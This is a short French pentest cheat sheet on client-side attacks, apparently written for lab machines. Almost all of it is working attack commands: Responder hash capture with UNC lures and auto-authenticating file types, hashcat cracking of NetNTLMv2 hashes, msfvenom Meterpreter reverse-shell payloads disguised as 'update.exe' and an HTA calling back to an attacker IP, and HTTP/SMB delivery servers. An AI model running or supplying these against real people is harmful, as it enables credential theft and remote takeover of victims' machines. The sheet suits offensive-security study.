Attaques côté client
sommaire
Attaques côté client — principe
Faire exécuter un fichier par un utilisateur (quand aucun service n’est exploitable directement). Souvent : capture de hash NetNTLM ou document piégé.
Capture de hash NetNTLM (Responder)
sudo responder -I tun0
# forcer l'authentification SMB de la victime vers nous :
# lien UNC \\10.10.14.5\share dans un champ / doc / partage inscriptible
# fichiers auto-auth : .url, .scf, .lnk, .library-ms, .searchConnector-ms
hashcat -m 5600 netntlmv2.txt rockyou.txt # casser le hash capture
Documents & exécutables piégés (msfvenom)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -f exe -o update.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -f hta-psh -o e.hta
# macro VBA Office (Shell), .lnk PowerShell, HTA -> mshta http://.../e.hta
Livraison
python3 -m http.server 80
impacket-smbserver share . -smb2support # partage SMB pour Responder / delivery